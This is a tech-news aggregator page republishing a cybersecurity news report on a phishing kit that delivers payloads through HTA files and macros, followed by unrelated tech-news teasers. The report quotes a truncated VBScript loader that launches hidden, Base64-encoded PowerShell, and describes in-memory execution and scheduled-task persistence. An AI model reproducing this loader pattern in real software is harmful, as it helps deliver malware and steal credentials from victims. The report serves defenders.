κατασκευή ιστοσελίδων ρόδος

TECH - WEB DEVELOPMENT NEWS

Get the latest tech - web development news and analysis on industry around the world.

  • HOME
You are here: Home / INDUSTRY NEWS / New ‘Point-and-Click’ Phishing Kit Bypasses User Awareness and Security Filters to Deliver Malicious Payloads
άμυνα
.

New ‘Point-and-Click’ Phishing Kit Bypasses User Awareness and Security Filters to Deliver Malicious Payloads

03/10/2025

A novel phishing kit has surfaced that enables threat actors to craft sophisticated lures with minimal technical expertise.

This “point-and-click” toolkit combines an intuitive web interface with powerful payload delivery mechanisms.

Attackers can select from preconfigured templates, customize branding elements, and target specific organizations or individuals.

Once a phishing page is deployed, victims are presented with seemingly innocuous download prompts that, in reality, trigger the delivery of malicious code.

Ad promoting the Impact Solutions payload delivery kit to cybercriminals (Source – Abnormal.ai)

Early incidents show the kit leveraging common file formats such as Microsoft Office documents and HTML applications.

Upon opening, the documents prompt users to enable macros or allow execution of embedded scripts.

Outsourcing the heavy lifting to built-in scripting engines, the kit constructs payloads on the fly, rendering many static signature–based defenses ineffective.

Initial campaign data indicates a significant click-through rate, suggesting the social engineering elements are exceptionally convincing.

Abnormal.ai analysts noted that the kit’s landing pages employ dynamic content injection to evade URL filtering solutions by rotating resource identifiers every few minutes.

This approach frustrates automated scanners and contributes to extended dwell time on victim machines, allowing stealthy payload staging and execution.

Researchers identified instances where the payload download URLs were concealed behind multi-step redirects, disguising their true destination until the final fetch operation.

Furthermore, Abnormal.ai researchers identified that once the victim enables content execution, the embedded script executes a PowerShell one-liner that retrieves and executes the final payload from a remote server.

This PowerShell command is obfuscated in Base64 and wrapped in a compressed archive, bypassing most heuristic engines. Victims remain unaware as the process runs with minimal user interaction and no visible windows.

In-Depth Examination of the Infection Mechanism

At the heart of the kit’s infection chain lies an HTML Application (HTA) module that acts as the initial loader.

Fake invoice HTML page telling victims to open a file that launches malware (Source – Abnormal.ai)

When the victim clicks “Enable Editing” or “Allow Blocked Content,” the HTA file executes:-

[script language=”VBScript”]
Dim objShell
Set objShell = CreateObject(“WScript.Shell”)
objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ” & _
“JABlAHgAZQBjAGUAbQBUAG8ARABvAHcAbgBsAG8AZABGAGUAcgBfAFIAZQBzAG8AdQByAGMAZQA9ICJuU0M…”
[/script]

This snippet decodes to a PowerShell payload that downloads an encrypted binary, decrypts it in memory, and executes it directly from RAM.

By operating in memory, the kit avoids writing malicious files to disk, undermining file-based detection.

The downloaded binary functions as a modular loader, fetching additional components such as credential stealers or ransomware droppers.

Persistence is achieved by creating a hidden scheduled task that re-launches the loader every hour under the context of the logged-on user.

This tactic ensures continued access even if the initial document is closed or the machine is rebooted. The scheduled task name is randomized for each campaign, complicating manual detection efforts.

Overall, this point-and-click phishing kit represents a significant escalation in accessible attack capabilities, combining user-friendly interfaces with advanced evasion and payload delivery techniques.

Cybersecurity teams must prioritize monitoring for anomalous task scheduler entries and unusual HTA executions, as well as reinforcing user training around enabling content in untrusted documents.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

Source: cybersecuritynews.com

Filed Under: INDUSTRY NEWS Tagged With: Source-10

5 ways mice can easily become more user-repairable

We use peripherals like keyboards and mice nearly every minute our PCs are awake, yet they seem to draw the short straw in terms of innovation. We’ve had a solid run with mechanical keyboards, where a vibrant community has pushed the industry from soldered, inaccessible boards to hot-swappable, endlessly customizable typing instruments. We’ve seen PC cases evolve with modularity and ease-of-access … [Read More...]

Anker's latest Prime charging devices are already 20 percent off

Anker's latest Prime charging devices are already on sale thanks to some handy coupons. The best deals include the laptop-compatible Prime Power Bank (26,250mAh, 300W), which is 20 percent off and down to $184 when you clip the on-page coupon on its Amazon page.This portable charger delivers a whopping 300W of total output between its two USB-C ports and single USB-A port. Anker says that, thanks … [Read More...]

This free browser extension was a game changer for my Dungeons & Dragons group

I love playing tabletop roleplaying games (TTRPGs), but virtual games just aren’t the same for me, especially when it comes to dice. There’s just something so satisfying about watching your d20 clatter around on the table (before probably landing on a nat one) that you usually miss out on with digital dice rolls in virtual games. Source: xda-developers.com … [Read More...]

If you can get past the terrible logo, Audacity 4 looks pretty great

Over 25 years it’s gone from a clean and simple audio editor, to a UX nightmare. Version 4 aims to fix that.Oct 5, 2025, 5:37 PM UTCTerrence O'Brien is the Verge’s weekend editor. He has over 18 years of experience, including 10 years as managing editor at Engadget.Rebrands rarely get much love. That backlash can be especially strong if you’re giving a facelift to a decades-old piece of software … [Read More...]

Uber and Lyft drivers in California are able to unionize under new law

California governor Gavin Newsom signed legislation on Friday that grants rideshare drivers in the state the right to unionize. It's the second state to grant organizing rights to rideshare drivers, who are independent contractors, following the passage of a similar law in Massachusetts in 2024. There are over 800,000 rideshare drivers in California, and the bill that was just signed into law … [Read More...]

This Roomba robot vacuum is on sale for $150 for Prime Day

Robot vacuums are great items to look for during events like October Prime Day. They're usually hundreds of dollars off, so you can save a ton if you're buying one as a gift or you want to upgrade an aging robovac you have at home already. One of the best deals this time around is on the iRobot Roomba 104, which is 40 percent off and on sale for only $150.This is a newer version of the unit that … [Read More...]

Marvel's Wolverine needed to feel different than Insomniac's Spider-Man games

Fans have been wanting to see anything from Insomniac Games' upcoming Wolverine for PlayStation 5. Following the massive leak for the company that revealed most of the planned game releases and concepts for their titles, many fans were wondering if they would have to wait longer before catching an official glimpse at what was coming next. But during the State of Play showcase for PlayStation in … [Read More...]

ICE is planning to create a surveillance team that hunts for leads on social media

The US Immigration and Customs Enforcement (ICE) has plans to build out a 24/7/365 surveillance team that focuses on scouring social media for case leads, as revealed in documents first discovered by Wired. According to public records, ICE has put out a request for information — which allows the agency to detail its preliminary scope of work to gauge any interest from contractors — that details … [Read More...]

OpenAI and Jony Ive may be struggling to figure out their AI device

OpenAI and Jony Ive face significant technical challenges as they work to develop a screen-less, AI-powered device, according to the Financial Times. Back in May, OpenAI acquired io, the device startup founded by the legendary Apple designer with OpenAI CEO Sam Altman, for $6.5 billion. At the time, Altman declared that Ive and his team would help the company “create a new generation of … [Read More...]

An old Xeon may use a lot of power, but it's not as slow as you might think

Contrary to what you may believe, home labs don’t require a lot of monetary investment. Depending on your requirements, you can put together a reliable containerization server using budget-friendly SBCs. Heck, if you’ve got a spare PC gathering dust, you can even arm it with a virtualization platform and turn it into a powerful home server. Source: xda-developers.com … [Read More...]

Tags

Source-1 Source-2 Source-3 Source-4 Source-5 Source-6 Source-7 Source-8 Source-9 Source-10 Source-12 Source-13 Source-15 Source-16

Tech Web Development News

This is a PERSONAL and PRIVATE WEBPAGE. Please leave this page. Contact me via email : admin@news-6.com about anything you would like to ask or problem.

Tech News

Disclaimer!
In every post is written below the original source of the post. Copyrights belong on their owners.

Web Development News

HOTELS – CRUISES – CARS – TRAVEL

Recent Posts

  • 5 ways mice can easily become more user-repairable
  • Anker's latest Prime charging devices are already 20 percent off
  • This free browser extension was a game changer for my Dungeons & Dragons group
  • If you can get past the terrible logo, Audacity 4 looks pretty great
  • Uber and Lyft drivers in California are able to unionize under new law

Technology - Seo

Categories

  • INDUSTRY NEWS

World Industry News

Privacy & Cookies: This site uses cookies.
To find out more, as well as how to remove or block these, see here: Our Cookie Policy
TECH - WEB DEVELOPMENT NEWS @ COPYRIGHTS 2023